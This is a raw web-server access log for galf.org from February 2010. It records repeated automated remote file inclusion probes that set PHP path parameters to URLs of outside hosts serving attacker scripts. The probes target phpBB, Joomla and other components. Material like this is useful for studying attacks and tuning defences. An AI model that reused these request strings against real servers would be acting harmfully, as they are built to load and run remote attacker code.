200.93.147.154 - - [08/Feb/2010:00:55:30 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:38 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:38 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:38 -0800] "GET /logs/access_100201.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:39 -0800] "GET /logs/access_100201.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:39 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:39 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:42 -0800] "GET /logs/access.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:55:45 -0800] "GET /logs/access.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:55:52 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:56:25 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:56:25 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:56:25 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:56:41 -0800] "GET /logs/access_091228.log/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:11 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:11 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:11 -0800] "GET /logs/access.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:15 -0800] "GET /logs/access.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:15 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:57:15 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [08/Feb/2010:00:57:41 -0800] "GET /logs/access_090720.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:57:51 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:57:51 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:57:56 -0800] "GET /logs/access_100104.log///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:58:06 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:58:21 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:00:58:28 -0800] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:36 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:36 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:36 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:58:40 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:00:58:41 -0800] "GET /logs/access.log///?_zb_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:44 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:44 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [08/Feb/2010:00:58:44 -0800] "GET /logs/access.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:49 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:49 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:49 -0800] "GET /logs/access_090720.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:51 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:51 -0800] "GET /logs/access_090720.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:00:58:51 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:58:56 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:00:58:56 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:00:59:15 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [08/Feb/2010:01:00:13 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:00:13 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:00:13 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:00:30 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:00:30 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:00:30 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:00:39 -0800] "GET //lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:00:39 -0800] "GET /logs/access_090831.log///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:00:39 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:00:56 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:01:01 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:01:01:01 -0800] "GET /logs/access.log///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:01:01:01 -0800] "GET //skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
110.45.145.178 - - [08/Feb/2010:01:01:01 -0800] "GET /logs///skin/ggambo7002_board/write.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:01:02 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [08/Feb/2010:01:01:21 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:01:21 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:01:21 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:01:28 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:01:39 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:01:42 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:02:02 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:02:06 -0800] "GET /logs/access_100111.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:02:11 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:02:14 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:02:23 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:02:23 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.246.76.241 - - [08/Feb/2010:01:02:40 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
216.246.76.241 - - [08/Feb/2010:01:02:40 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
216.246.76.241 - - [08/Feb/2010:01:02:40 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:14 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:14 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:15 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:15 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:21 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:21 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:32 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:32 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:38 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:39 -0800] "GET /logs/access_091228.log%20%20/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:39 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:39 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:39 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:45 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:45 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:45 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:03:45 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [08/Feb/2010:01:03:52 -0800] "GET /logs/access_090720.log/main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [08/Feb/2010:01:03:52 -0800] "GET /main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [08/Feb/2010:01:03:52 -0800] "GET /logs/main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:04 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:05 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:11 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:11 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:15 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:19 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:19 -0800] "GET /logs/access.log%20%20/include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:19 -0800] "GET /include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:23 -0800] "GET /include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:23 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:26 -0800] "GET /logs/access.log/include.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:35 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:04:39 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:39 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:04:40 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
221.143.40.35 - - [08/Feb/2010:01:04:40 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.239.227.191 - - [08/Feb/2010:01:04:47 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.239.227.191 - - [08/Feb/2010:01:04:47 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:04:48 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:04:48 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:04:48 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:49 -0800] "GET /include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:49 -0800] "GET /logs/access.log%20%20/include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.126 - - [08/Feb/2010:01:04:49 -0800] "GET /logs/include.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [08/Feb/2010:01:04:57 -0800] "GET /logs/access_091228.log%20%20/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:05:16 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [08/Feb/2010:01:05:29 -0800] "GET /main.php?pagina=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
